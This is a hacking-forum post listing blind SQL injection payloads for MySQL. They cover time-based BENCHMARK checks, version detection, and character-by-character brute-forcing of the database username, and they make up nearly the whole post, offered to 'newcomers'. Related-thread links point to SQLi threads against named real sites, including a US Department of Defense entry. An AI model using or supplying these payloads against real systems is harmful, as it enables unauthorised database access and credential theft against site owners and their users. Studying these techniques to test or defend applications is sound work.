[SQLi] Blind SQLi queries
#1
[SQLi] Blind SQLi queries

Credits: Rouge Coder @ Intosec

Rouge Coder Wrote:First off, as the title says. This is not a tutorial. I've been messing around keeping my skills fresh today and wrote downsome blind SQLi queries that I used and thought I'd share them here.

Code:
// Check for blind injection vulnerability
OR (IF (1=2, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) --

// Check for subselect
OR (SELECT 1)=1 --

// Find version
AND SUBSTRING(@@version,1,1) = 4 --

// Find length of database user
OR (IF (LENGTH(user()) > 1, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) --

// Brute-force database username (65 = A -> 90 = Z, 97 = a -> 122 = z)
OR (IF (ASCII(SUBSTRING(user(),1,1)) > 65, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) -- // Find first letter
OR (IF (ASCII(SUBSTRING(user(),2,1)) > 65, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) -- // Find second letter
OR (IF (ASCII(SUBSTRING(user(),3,1)) > 65, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) -- // Find third letter

There's of course a lot more that can be done here, but this should at least give newcomers a decent idea about how blindsql injection is working.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  basic sqli supports 0 4,231 09-29-2017, 08:27 PM
Last Post: supports
  Lenovolaptop.co.uk SQLi Cryptography 2 5,292 12-27-2015, 09:42 PM
Last Post: Cryptography
  PoC - PHP GroupWare Headlines Admin SQLi MLT 0 3,614 12-24-2015, 11:48 AM
Last Post: MLT
  US Department of Defense - SQLi Vuln MLT 6 5,678 12-18-2015, 03:48 PM
Last Post: MLT